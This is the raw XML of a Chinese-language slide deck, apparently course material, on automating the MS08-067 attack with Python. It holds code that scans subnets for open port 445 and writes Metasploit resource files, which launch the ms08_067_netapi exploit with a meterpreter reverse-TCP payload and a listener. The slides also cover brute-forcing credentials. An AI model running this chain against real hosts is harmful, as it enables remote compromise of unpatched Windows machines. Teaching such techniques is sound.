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sldIdLst>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="327" r:id="rId4"/>
    <p:sldId id="316" r:id="rId5"/>
    <p:sldId id="288" r:id="rId6"/>
    <p:sldId id="328" r:id="rId7"/>
    <p:sldId id="321" r:id="rId8"/>
    <p:sldId id="320" r:id="rId9"/>
    <p:sldId id="322" r:id="rId10"/>
    <p:sldId id="323" r:id="rId11"/>
    <p:sldId id="324" r:id="rId12"/>
    <p:sldId id="325" r:id="rId13"/>
    <p:sldId id="326" r:id="rId14"/>
    <p:sldId id="257" r:id="rId15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720" y="-108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2018-5-3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1754153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知识点：设置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5400" dirty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5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1916371"/>
            <a:ext cx="9754421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confickerExploit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('use exploit/windows/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/ms08_067_netapi\n')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RHOST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PAYLOAD windows/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reverse_tcp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LPORT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LHOST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('exploit -j -z\n')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84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1" y="2242942"/>
            <a:ext cx="97544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使用方法：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需要和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工具结合使用，所以此脚本在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kali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系统运行测试。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执行命令：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python3.5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5.1.7.py</a:t>
            </a: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53" y="3662363"/>
            <a:ext cx="7544852" cy="37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7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57" y="2453906"/>
            <a:ext cx="6119471" cy="364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462733" y="1954282"/>
            <a:ext cx="97544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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" ker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python3.5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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5.1.7.py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-H 192.168.24.76 -l 192.168.24.14 -p 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22222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11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000808" y="2756847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6800" indent="22680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lang="zh-CN" altLang="zh-CN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/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3006725" y="1348740"/>
            <a:ext cx="5930900" cy="502285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65527" y="3018545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639901" y="3401688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目录</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Freeform 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2139425" y="1589608"/>
            <a:ext cx="651442" cy="4055051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001698" y="2512527"/>
            <a:ext cx="5930900" cy="502285"/>
            <a:chOff x="3710491" y="1059582"/>
            <a:chExt cx="4101695" cy="599235"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12" name="组合 1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4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15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3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16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83567" y="3092503"/>
            <a:ext cx="5930900" cy="502285"/>
            <a:chOff x="3710491" y="1059582"/>
            <a:chExt cx="410169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1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2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04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23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12646" y="4876717"/>
            <a:ext cx="5930900" cy="502285"/>
            <a:chOff x="3710491" y="1059582"/>
            <a:chExt cx="4101695" cy="599235"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="26" name="组合 25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8" name="圆角矩形 113"/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29" name="TextBox 35"/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7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0" name="TextBox 32"/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2320E71-0B09-41CE-902E-580999D89832}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2983567" y="1983232"/>
            <a:ext cx="5930900" cy="502285"/>
            <a:chOff x="3710491" y="1059582"/>
            <a:chExt cx="4101695" cy="59923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197434F1-9F7B-4D57-9BC1-0A3AFC430DC8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38" name="圆角矩形 91">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{C2666CCB-871A-467A-9770-CCB63D831914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39" name="圆角矩形 113">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{4A7A5DB6-C654-43A8-A52E-9DBE4235860E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0" name="TextBox 35">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{B127B52B-B846-4AEA-901E-FAAEB1D65C53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xmlns="" id="{8DA4A5B3-4889-4370-8FA5-76769864471D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6CB29060-2C00-4F85-9EFA-5D1279AE52A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3006725" y="3707336"/>
            <a:ext cx="5930900" cy="502285"/>
            <a:chOff x="3710491" y="1059582"/>
            <a:chExt cx="4101695" cy="59923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003F2D3F-8A5C-4F9F-BEB2-855A155325D4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5" name="圆角矩形 12">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{B5076B80-ED1F-4A7C-9619-39D23742226E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6" name="圆角矩形 113">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{785F7E87-63D6-4F3F-9F71-2249EFE889A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47" name="TextBox 35">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{F36499A5-EC39-4124-91E4-45D5C448EB15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kumimoji="0" lang="en-US" altLang="en-US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5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xmlns="" id="{6FCC9D33-8ABB-404F-8AB8-F34CC9616288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9C891C38-0C8E-4773-ADC2-85C735951C3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2983567" y="4313118"/>
            <a:ext cx="5930900" cy="502285"/>
            <a:chOff x="3710491" y="1059582"/>
            <a:chExt cx="4101695" cy="59923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xmlns="" id="{20189918-65EF-4825-87CF-38640F1340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1" name="圆角矩形 19">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{0B370904-6EA2-4B95-8ED2-905F82CAED37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2" name="圆角矩形 113">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{99404737-9DC9-4A78-9A09-2B7B0AB01794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3" name="TextBox 35">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{8473388B-C294-4774-86D5-7F9395CD27FE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6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xmlns="" id="{A37FDADC-08F5-42FF-B303-0E26459FE6A5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xmlns="" id="{044B19CD-3FF2-4FAC-B86A-C396F3E539E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3001698" y="5465761"/>
            <a:ext cx="5930900" cy="502285"/>
            <a:chOff x="3710491" y="1059582"/>
            <a:chExt cx="4101695" cy="59923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3C839FC2-280A-4FFA-9F78-D135BBF13A51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57" name="圆角矩形 26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{B3114E08-5E75-4020-830A-7B2AB11C932B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8" name="圆角矩形 113">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{FB0C20CB-D398-42B7-9E80-FAA0BF301220}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4687456" y="1262713"/>
                <a:ext cx="2983131" cy="38945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lvl="0" algn="ctr" defTabSz="914400">
                  <a:defRPr/>
                </a:pP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+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="59" name="TextBox 35">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{6EC71761-1F1A-4229-87E2-72C3455852F9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42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charset="-122"/>
                    <a:ea typeface="微软雅黑" charset="-122"/>
                  </a:rPr>
                  <a:t>0</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="0" dirty="0"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charset="-122"/>
                    <a:ea typeface="微软雅黑" charset="-122"/>
                  </a:rPr>
                  <a:t>8</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="x-none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charset="-122"/>
                  <a:ea typeface="微软雅黑" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="TextBox 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{4B256F5C-1E56-4EAD-8742-F590B7E668A2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4331492" y="1248480"/>
              <a:ext cx="309880" cy="35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B15A512-A3F1-49E1-8DD5-C07CF758356D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3803235" y="1435482"/>
            <a:ext cx="504656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ms08-067_netapi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漏洞两个可用攻击特征</a:t>
            </a:r>
          </a:p>
          <a:p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xmlns="" id="{8611994D-59C1-473C-AA77-4C2C745AC31F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3823733" y="2065741"/>
            <a:ext cx="5046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攻击用密码列表制作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A34204B9-2225-4D1F-A993-E75286FABB2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3722210" y="2616054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 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框架下载安装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xmlns="" id="{0820B6B3-4FEB-4D10-ABCA-7E88F6779581}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3799540" y="3162412"/>
            <a:ext cx="4981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Metasploit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的执行攻击的步骤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96E9276F-31E5-4811-A472-AEDFBEFA6A57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3803234" y="3794095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启动配置文件执行攻击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xmlns="" id="{AE5B3BB9-3932-474C-90CF-E327073D0EB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3804098" y="4362805"/>
            <a:ext cx="691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利用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python-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" kern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nmap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模块探测主机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445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端口</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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847498D4-AC66-4BD5-9E7E-8C9CC9068C73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3814810" y="4963476"/>
            <a:ext cx="3905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设置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TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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反弹连接的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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Payload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FE249A1-8398-411F-A01E-883454061BD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3823733" y="5563928"/>
            <a:ext cx="389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charset="-122"/>
                <a:ea typeface="微软雅黑" charset="-122"/>
              </a:rPr>
              <a:t>针对用户名和密码组合暴破</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="133764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59981" y="3430093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3918246" y="3484518"/>
            <a:ext cx="5957260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反弹连接的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="0" dirty="0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endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="0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15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2883958" y="2822799"/>
            <a:ext cx="1355130" cy="13234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 smtClean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7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515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2798114"/>
            <a:ext cx="97544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Payload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：能实现攻击的部分，可能是一段代码或命令。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反弹连接：为了突破防火墙的限制，实现被控主机主动向控制机发起连接的一种技术。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2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2798114"/>
            <a:ext cx="975442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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="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我们可以对存在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ms08-067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漏洞的主机进行攻击，并可获得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了一个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shell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。如果对一个网段攻击重复上面攻击操作即可</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern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，但是整个网段或者更大范围内的主机逐个进行攻击，这个过程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会花费大量的时间来修改配置文件，但是如果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，我们可以生成一个快速的扫描脚本，扫描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445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端口打开的主机，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然后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利用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资源文件攻击有漏洞的主机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1743316"/>
            <a:ext cx="9754421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findTgts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subNet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nmap.PortScanner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nmScan.scan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subNet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'445')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= []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for host in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nmScan.all_hosts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if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[host].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has_tcp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(445):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	state =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nmScan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[host]['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'][445]['state']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	if state == 'open':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		print ('[+] Found Target Host: ' + host)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		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tgtHosts.append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(host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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1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2291928"/>
            <a:ext cx="97544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分析代码：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首先，我们可以从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先前的端口扫描的例子中利用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python-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nmap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模块。这里，函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findTgts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以潜在目标主机作为输入，返回所有开了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 445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端口的主机。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 445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端口是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SMB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协议的主要端口。只要主机的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TCP 445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端口是开放的，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我们的脚本就能有效的攻击，这会消除主机对我们尝试连接的阻碍。函数通过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迭代扫描所有的主机，如果函数发现主机开放了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445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端口，就将主机加入列表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中。完成迭代后，函数会返回包含所有开放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445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端口主机的列表。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8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2291928"/>
            <a:ext cx="97544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setupHandler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):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('use exploit/multi/handler\n')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PAYLOAD windows/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/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reverse_tcp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LPORT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str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lport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('set LHOST ' +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lhost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+ '\n')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('exploit -j -z\n')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="504000" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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	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configFile.write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('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setg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DisablePayloadHandler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1\n')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4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0462" y="1916371"/>
            <a:ext cx="97544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分析代码：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对攻击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的目标设置监听，监听器或者命令行与控制信道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，一旦渗透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成功我们就可以与远程目标主机进行交互。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提供了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先进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的动态的攻击荷载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运行在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远程主机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上，返回给我们命令行用来控制主机，提供了大量的控制和分析目标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主机的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能力。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Meterpreter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反向连接到攻击者主机，并控制主机的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的模块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叫做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multi/handler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。为了在我们的主机上设置 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multi/handler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的监听器，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我们首先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要写下指令到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Metasploit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的资源配置文件中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注意：我们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将设置一个全局配置 </a:t>
            </a:r>
            <a:r>
              <a:rPr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DisablePayloadHandler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来标识以后我</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="504000" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc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们所有的主机都不必设置监听器，因为我们已经正在监听了。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="16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60617" y="657666"/>
            <a:ext cx="5894383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35221" y="737342"/>
            <a:ext cx="5469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TCP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反弹连接的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Payload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95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579</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>75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未定义</cp:lastModifiedBy>
  <cp:revision>189</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-06-05T01:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-05-03T06:23:15Z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